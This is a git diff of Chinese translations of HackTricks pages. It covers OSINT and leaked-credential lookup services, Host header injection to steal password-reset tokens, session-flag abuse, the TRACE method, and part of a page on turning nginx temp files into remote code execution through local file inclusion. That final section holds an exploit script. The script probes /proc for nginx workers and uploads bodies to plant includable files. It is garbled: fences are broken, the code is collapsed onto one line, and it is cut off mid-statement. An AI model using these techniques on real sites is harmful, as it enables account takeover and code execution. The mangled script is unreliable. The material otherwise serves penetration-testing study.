* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,129 +1,130 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# [ProjectHoneypot](https://www.projecthoneypot.org/)
|
||||
|
||||
您可以查询一个IP是否与可疑/恶意活动有关。完全免费。
|
||||
您可以查询 IP 是否涉及可疑/恶意活动。完全免费。
|
||||
|
||||
# [**BotScout**](http://botscout.com/api.htm)
|
||||
|
||||
检查IP地址是否与注册账户的机器人有关。它还可以检查用户名和电子邮件。最初免费。
|
||||
检查 IP 地址是否与注册账户的机器人相关。还可以检查用户名和电子邮件。最初免费。
|
||||
|
||||
# [Hunter](https://hunter.io/)
|
||||
|
||||
查找和验证电子邮件。
|
||||
一些免费API请求,更多则需要付费。
|
||||
商业的?
|
||||
查找并验证电子邮件。
|
||||
一些免费 API 请求,需要付费获取更多。
|
||||
商业用途?
|
||||
|
||||
# [AlientVault](https://otx.alienvault.com/api)
|
||||
|
||||
查找与IP和域名相关的恶意活动。免费。
|
||||
查找与 IP 和域相关的恶意活动。免费。
|
||||
|
||||
# [Clearbit](https://dashboard.clearbit.com/)
|
||||
|
||||
查找与电子邮件相关的个人数据(在其他平台上的个人资料),域名(基本公司信息,邮件和工作人员)和公司(从邮件获取公司信息)。
|
||||
您需要支付费用以访问所有可能性。
|
||||
商业的?
|
||||
查找与电子邮件(其他平台上的个人资料)、域(基本公司信息、邮件和工作人员)和公司(从邮件获取公司信息)相关的个人数据。
|
||||
您需要付费才能访问所有功能。
|
||||
商业用途?
|
||||
|
||||
# [BuiltWith](https://builtwith.com/)
|
||||
|
||||
网站使用的技术。昂贵...
|
||||
商业的?
|
||||
商业用途?
|
||||
|
||||
# [Fraudguard](https://fraudguard.io/)
|
||||
|
||||
检查主机(域名或IP)是否与可疑/恶意活动有关。有一些免费API访问。
|
||||
商业的?
|
||||
检查主机(域或 IP)是否与可疑/恶意活动相关。有一些免费 API 访问。
|
||||
商业用途?
|
||||
|
||||
# [FortiGuard](https://fortiguard.com/)
|
||||
|
||||
检查主机(域名或IP)是否与可疑/恶意活动有关。有一些免费API访问。
|
||||
检查主机(域或 IP)是否与可疑/恶意活动相关。有一些免费 API 访问。
|
||||
|
||||
# [SpamCop](https://www.spamcop.net/)
|
||||
|
||||
指示主机是否与垃圾邮件活动有关。有一些免费API访问。
|
||||
指示主机是否与垃圾邮件活动相关。有一些免费 API 访问。
|
||||
|
||||
# [mywot](https://www.mywot.com/)
|
||||
|
||||
基于意见和其他指标,获取一个域名是否与可疑/恶意信息有关。
|
||||
基于意见和其他指标,了解域名是否与可疑/恶意信息相关。
|
||||
|
||||
# [ipinfo](https://ipinfo.io/)
|
||||
|
||||
获取IP地址的基本信息。您可以每月测试多达100K次。
|
||||
从 IP 地址获取基本信息。您可以每月测试高达 100K。
|
||||
|
||||
# [securitytrails](https://securitytrails.com/app/account)
|
||||
|
||||
这个平台提供关于域名和IP地址的信息,如一个IP内的域名或域名服务器内的域名,一个电子邮件所拥有的域名(查找相关域名),域名的IP历史(查找CloudFlare背后的主机),使用一个名称服务器的所有域名......
|
||||
此平台提供有关域名和 IP 地址的信息,如 IP 中的域或域服务器中的域,由电子邮件拥有的域(查找相关域),域的 IP 历史(查找 CloudFlare 背后的主机),使用特定名称服务器的所有域等。
|
||||
您有一些免费访问权限。
|
||||
|
||||
# [fullcontact](https://www.fullcontact.com/)
|
||||
|
||||
允许通过电子邮件、域名或公司名称搜索并检索相关的“个人”信息。它还可以验证电子邮件。有一些免费访问权限。
|
||||
允许通过电子邮件、域或公司名称搜索并检索相关的“个人”信息。还可以验证电子邮件。有一些免费访问权限。
|
||||
|
||||
# [RiskIQ](https://www.spiderfoot.net/documentation/)
|
||||
|
||||
即使在免费/社区版本中,也能从域名和IP地址获取大量信息。
|
||||
有关域名和 IP 的大量信息,即使在免费/社区版本中也是如此。
|
||||
|
||||
# [\_IntelligenceX](https://intelx.io/)
|
||||
|
||||
搜索域名、IP和电子邮件,并从泄露中获取信息。有一些免费访问权限。
|
||||
搜索域、IP 和电子邮件,并从转储中获取信息。有一些免费访问权限。
|
||||
|
||||
# [IBM X-Force Exchange](https://exchange.xforce.ibmcloud.com/)
|
||||
|
||||
通过IP搜索并收集与可疑活动相关的信息。有一些免费访问权限。
|
||||
按 IP 搜索并收集与可疑活动相关的信息。有一些免费访问权限。
|
||||
|
||||
# [Greynoise](https://viz.greynoise.io/)
|
||||
|
||||
通过IP或IP范围搜索,并获取有关扫描互联网的IP的信息。15天免费访问。
|
||||
按 IP 或 IP 范围搜索并获取有关扫描互联网的 IP 的信息。15 天免费访问。
|
||||
|
||||
# [Shodan](https://www.shodan.io/)
|
||||
|
||||
获取一个IP地址的扫描信息。有一些免费api访问权限。
|
||||
获取 IP 地址的扫描信息。有一些免费 API 访问。
|
||||
|
||||
# [Censys](https://censys.io/)
|
||||
|
||||
与shodan非常相似
|
||||
与 shodan 非常相似
|
||||
|
||||
# [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/)
|
||||
|
||||
通过关键词搜索开放的S3桶。
|
||||
通过关键字搜索找到开放的 S3 存储桶。
|
||||
|
||||
# [Dehashed](https://www.dehashed.com/data)
|
||||
|
||||
查找电子邮件甚至域名的泄露凭证
|
||||
商业的?
|
||||
查找泄露的电子邮件和域的凭据
|
||||
商业用途?
|
||||
|
||||
# [psbdmp](https://psbdmp.ws/)
|
||||
|
||||
搜索电子邮件出现的过去的粘贴文本。商业的?
|
||||
搜索过去出现电子邮件的 pastebins。商业用途?
|
||||
|
||||
# [emailrep.io](https://emailrep.io/key)
|
||||
|
||||
获取邮件的声誉。商业的?
|
||||
获取邮件的声誉。商业用途?
|
||||
|
||||
# [ghostproject](https://ghostproject.fr/)
|
||||
|
||||
从泄露的电子邮件中获取密码。商业的?
|
||||
从泄露的电子邮件中获取密码。商业用途?
|
||||
|
||||
# [Binaryedge](https://www.binaryedge.io/)
|
||||
|
||||
从IP获取有趣的信息
|
||||
从 IP 获取有趣的信息
|
||||
|
||||
# [haveibeenpwned](https://haveibeenpwned.com/)
|
||||
|
||||
通过域名和电子邮件搜索,查看它是否被盗用和密码。商业的?
|
||||
按域和电子邮件搜索,查看是否被入侵以及密码。商业用途?
|
||||
|
||||
[https://dnsdumpster.com/](https://dnsdumpster.com/)\(在商业工具中?\)
|
||||
|
||||
|
@ -133,16 +134,17 @@
|
|||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,57 +1,63 @@
|
|||
# 其他网络技巧
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter上** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧**。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
### Host头
|
||||
### 主机头部
|
||||
|
||||
有时后端会信任**Host头**来执行某些操作。例如,它可以将其值用作发送密码重置的**域名**。因此,当您收到一封带有重置密码链接的电子邮件时,使用的域名就是您在Host头中输入的域名。然后,您可以请求其他用户的密码重置并将域名更改为您控制的域名,以窃取他们的密码重置代码。[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
|
||||
有时后端会信任 **主机头部** 来执行某些操作。例如,它可以使用其值作为 **发送密码重置的域**。因此,当您收到一封包含重置密码链接的电子邮件时,使用的域是您放在主机头部中的域。然后,您可以请求其他用户的密码重置并将域更改为您控制的域以窃取其密码重置代码。[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
|
||||
|
||||
{% hint style="warning" %}
|
||||
请注意,您甚至可能无需等待用户单击重置密码链接即可获取令牌,因为**垃圾邮件过滤器或其他中间设备/机器人可能会单击链接以进行分析**。
|
||||
请注意,您甚至可能无需等待用户单击重置密码链接以获取令牌,因为甚至 **垃圾邮件过滤器或其他中间设备/机器人可能会单击以分析它**。
|
||||
{% endhint %}
|
||||
|
||||
### 会话布尔值
|
||||
|
||||
有时,当您正确完成某些验证时,后端会**将一个布尔值(True)添加到会话的安全属性中**。然后,不同的端点将知道您是否成功通过了该检查。\
|
||||
然而,如果您**通过了检查**并且您的会话在安全属性中被授予了该"True"值,您可以尝试访问其他依赖于相同属性的资源,但您**不应该有权限**访问这些资源。[WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
|
||||
有时,当您正确完成某些验证时,后端将 **只向您的会话的安全属性添加一个值为“True”的布尔值**。然后,不同的端点将知道您是否成功通过了该检查。\
|
||||
但是,如果您 **通过了检查** 并且您的会话在安全属性中被授予了该“True”值,您可以尝试 **访问其他资源**,这些资源 **依赖于相同的属性**,但您 **不应该有权限** 访问。[WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
|
||||
|
||||
### 注册功能
|
||||
|
||||
尝试以已存在的用户注册。还可以尝试使用等效字符(点、大量空格和Unicode)。
|
||||
尝试以已存在的用户注册。还尝试使用等效字符(点、大量空格和 Unicode)。
|
||||
|
||||
### 接管电子邮件
|
||||
|
||||
注册一个电子邮件,在确认之前更改电子邮件,然后,如果新的确认电子邮件发送到第一个注册的电子邮件,您可以接管任何电子邮件。或者,如果您可以启用第二个电子邮件来确认第一个电子邮件,您也可以接管任何帐户。
|
||||
注册一个电子邮件,在确认之前更改电子邮件,然后,如果新的确认电子邮件发送到第一个注册的电子邮件,您可以接管任何电子邮件。或者如果您可以启用第二个电子邮件确认第一个电子邮件,您也可以接管任何帐户。
|
||||
|
||||
### 访问使用Atlassian的公司的内部服务台
|
||||
### 访问使用 Atlassian 的公司内部服务台
|
||||
|
||||
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
|
||||
|
||||
### TRACE方法
|
||||
### TRACE 方法
|
||||
|
||||
开发人员可能会忘记在生产环境中禁用各种调试选项。例如,HTTP `TRACE` 方法是为了诊断目的而设计的。如果启用,Web服务器将通过在响应中回显确切接收到的请求来响应使用`TRACE`方法的请求。这种行为通常是无害的,但有时会导致信息泄露,例如可能由反向代理附加到请求中的内部身份验证标头的名称。![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
|
||||
开发人员可能会忘记在生产环境中禁用各种调试选项。例如,HTTP `TRACE` 方法是为诊断目的而设计的。如果启用,Web 服务器将通过在响应中回显接收到的确切请求来响应使用 `TRACE` 方法的请求。这种行为通常是无害的,但有时会导致信息泄露,例如可能由反向代理附加到请求的内部身份验证标头的名称。![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
|
||||
|
||||
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter上** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧**。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,36 +1,21 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄级人物</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
**研究更多关于对DNS的攻击**
|
||||
**深入研究DNS攻击**
|
||||
|
||||
**DNSSEC和DNSSEC3**
|
||||
|
||||
**IPv6中的DNS**
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄级人物</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
# 通过Nginx临时文件进行LFI2RCE
|
||||
# 通过Nginx临时文件实现LFI2RCE
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
|
||||
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。**
|
||||
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -18,11 +18,11 @@
|
|||
|
||||
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
|
||||
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
|
||||
|
||||
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
|
||||
WhiteIntel的主要目标是打击由窃取信息的恶意软件导致的账户劫持和勒索软件攻击。
|
||||
|
||||
您可以访问他们的网站并免费尝试他们的引擎:
|
||||
您可以在以下网址检查他们的网站并尝试他们的引擎,**免费**使用:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -30,13 +30,13 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
|
|||
|
||||
## 可利用的配置
|
||||
|
||||
[**来自https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**的示例](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
[**示例来自 https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||
|
||||
* PHP代码:
|
||||
|
||||
\`\`\`\`h\`
|
||||
|
||||
/dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` 注意:在此示例中,不能直接包含\`/proc/34/fd/15\`,因为PHP的\`include\`函数会将路径解析为\`/var/lib/nginx/body/0000001368 (deleted)\`,而该路径在文件系统中不存在。幸运的是,可以通过一些间接方式绕过这个小限制,比如:\`/proc/self/fd/34/../../../34/fd/15\`,最终将执行已删除的\`/var/lib/nginx/body/0000001368\`文件的内容。 ## 完整利用 \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # 利用nginx的客户端主体缓冲辅助进行PHP本地文件包含(LFI) # 详细信息请参阅https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ URL = f'http://{sys.argv\[1\]}:{sys.argv\[2\]}/' # 查找nginx工作进程 r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # 上传一个大的客户端主体以强制nginx创建一个/var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //'
|
||||
